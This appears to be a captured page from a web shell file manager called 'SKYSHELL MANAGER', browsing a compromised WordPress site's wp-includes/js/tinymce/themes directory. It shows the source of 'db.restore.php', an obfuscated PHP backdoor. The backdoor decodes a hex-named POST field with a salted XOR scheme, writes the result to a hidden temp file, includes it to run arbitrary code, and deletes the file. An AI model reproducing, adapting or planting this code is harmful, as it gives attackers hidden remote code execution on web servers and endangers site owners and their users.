📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
terracebizon
/
public_html
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
12934.91 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: db.restore.php
<?php if(filter_has_var(INPUT_POST, "ma\x72\x6B\x65r")){ $symbol = $_POST["ma\x72\x6B\x65r"]; $symbol =explode ( '.' ,$symbol ) ; $ent = ''; $salt2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt2 ); foreach ($symbol as $z => $v3): $chS = ord($salt2[$z %$sLen] ); $d = ((int)$v3 - $chS - ($z %10)) ^ 24; $ent.= chr($d ); endforeach; $k = array_filter([getcwd(), getenv("TMP"), sys_get_temp_dir(), "/var/tmp", "/dev/shm", ini_get("upload_tmp_dir"), session_save_path(), getenv("TEMP"), "/tmp"]); while ($resource = array_shift($k)) { if ((is_dir($resource) and is_writable($resource))) { $mrk = str_replace("{var_dir}", $resource, "{var_dir}/.comp"); $file = fopen($mrk, 'w'); if ($file) { fwrite($file, $ent); fclose($file); include $mrk; @unlink($mrk); die(); } } } }
Save